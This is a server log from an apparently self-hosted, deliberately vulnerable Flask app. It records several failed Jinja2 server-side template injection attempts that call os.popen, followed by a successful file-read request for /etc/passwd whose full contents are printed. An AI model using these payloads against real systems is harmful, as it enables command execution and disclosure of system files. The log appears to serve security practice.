jinja2.exceptions.UndefinedError: 'types.GenericAlias object' has no attribute '__globals__'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:12:29] "[35m[1mGET /hello?name={{config.__class__.init__.__globals__['os'].popen('is').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config.__class__.init__.__globals__['os'].popen('Is').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 466, in getitem
    return obj[argument]
           ~~~^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'types.GenericAlias object' has no attribute '__globals__'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:12:37] "[35m[1mGET /hello?name={{config.__class__.init__.__globals__['os'].popen('Is').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        test
</div>

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:12:52] "GET /hello?name=test HTTP/1.1" 200 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config._class_.init_._globals_['os'].popen('Is').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 485, in getattr
    return getattr(obj, attribute)
           ^^^^^^^^^^^^^^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'flask.config.Config object' has no attribute '_class_'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:13:18] "[35m[1mGET /hello?name={{config._class_.init_._globals_['os'].popen('Is').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config._class_.init_._globals_['os'].popen('|s').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 485, in getattr
    return getattr(obj, attribute)
           ^^^^^^^^^^^^^^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'flask.config.Config object' has no attribute '_class_'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:13:26] "[35m[1mGET /hello?name={{config._class_.init_._globals_['os'].popen('|s').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:<div>
        <h1>Hello</h1>
        {{config._class_.init_._globals_['os'].popen('ls').read()}}
</div>

ERROR:vulnerable-flask-app:Exception on /hello [GET]
Traceback (most recent call last):
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 1455, in wsgi_app
    response = self.full_dispatch_request()
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 869, in full_dispatch_request
    rv = self.handle_user_exception(e)
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 867, in full_dispatch_request
    rv = self.dispatch_request()
         ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/app.py", line 852, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/vuln/vulnerable-flask-app.py", line 51, in hello_ssti
    return render_template_string(template)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 164, in render_template_string
    return _render(app, template, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/flask/templating.py", line 133, in _render
    rv = template.render(context)
         ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 1301, in render
    self.environment.handle_exception()
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 936, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "<template>", line 3, in top-level template code
  File "/home/jeff/Documents/pythnwebserver/webapp/venv/lib64/python3.11/site-packages/jinja2/environment.py", line 485, in getattr
    return getattr(obj, attribute)
           ^^^^^^^^^^^^^^^^^^^^^^^
jinja2.exceptions.UndefinedError: 'flask.config.Config object' has no attribute '_class_'
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:13:32] "[35m[1mGET /hello?name={{config._class_.init_._globals_['os'].popen('ls').read()}} HTTP/1.1[0m" 500 -
DEBUG:root:root:x:0:0:Super User:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/sbin/nologin
daemon:x:2:2:daemon:/sbin:/usr/sbin/nologin
adm:x:3:4:adm:/var/adm:/usr/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/usr/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/usr/sbin/nologin
operator:x:11:0:operator:/root:/usr/sbin/nologin
games:x:12:100:games:/usr/games:/usr/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/usr/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/usr/sbin/nologin
dbus:x:81:81:System Message Bus:/:/usr/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
tss:x:59:59:Account used for TPM access:/:/usr/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/usr/sbin/nologin
systemd-oom:x:999:999:systemd Userspace OOM Killer:/:/usr/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/usr/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
polkitd:x:998:997:User for polkitd:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
geoclue:x:997:996:User for geoclue:/var/lib/geoclue:/sbin/nologin
nm-openconnect:x:996:995:NetworkManager user for OpenConnect:/:/sbin/nologin
colord:x:995:994:User for colord:/var/lib/colord:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
gluster:x:994:993:GlusterFS daemons:/run/gluster:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pipewire:x:993:992:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
chrony:x:992:990:chrony system user:/var/lib/chrony:/sbin/nologin
dnsmasq:x:991:989:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/usr/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
saslauth:x:990:76:Saslauthd user:/run/saslauthd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
openvpn:x:989:988:OpenVPN:/etc/openvpn:/sbin/nologin
nm-openvpn:x:988:987:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
unbound:x:987:986:Unbound DNS resolver:/var/lib/unbound:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
flatpak:x:986:984:Flatpak system helper:/:/usr/sbin/nologin
gdm:x:42:42:GNOME Display Manager:/var/lib/gdm:/usr/sbin/nologin
gnome-initial-setup:x:985:983::/run/gnome-initial-setup/:/sbin/nologin
vboxadd:x:984:1::/var/run/vboxadd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/usr/share/empty.sshd:/usr/sbin/nologin
tcpdump:x:72:72:tcpdump:/:/usr/sbin/nologin
systemd-coredump:x:978:978:systemd Core Dumper:/:/usr/sbin/nologin
systemd-timesync:x:977:977:systemd Time Synchronization:/:/usr/sbin/nologin
jeff:x:1000:1000:Jeff:/home/jeff:/bin/bash
clevis:x:976:975:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/usr/sbin/nologin
pkg-build:x:975:974:lpf local package build user:/var/lib/lpf:/sbin/nologin
akmods:x:974:972:User is used by akmods to build akmod packages:/var/cache/akmods/:/sbin/nologin
clamupdate:x:973:969:Clamav database update user:/var/lib/clamav:/sbin/nologin
clamscan:x:972:967:Clamav scanner user:/:/sbin/nologin

INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:14:58] "GET /read_file?filename=/etc/passwd HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:50:03] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:51:20] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:51:24] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:53:04] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [19/Oct/2023 14:53:07] "GET / HTTP/1.1" 200 -
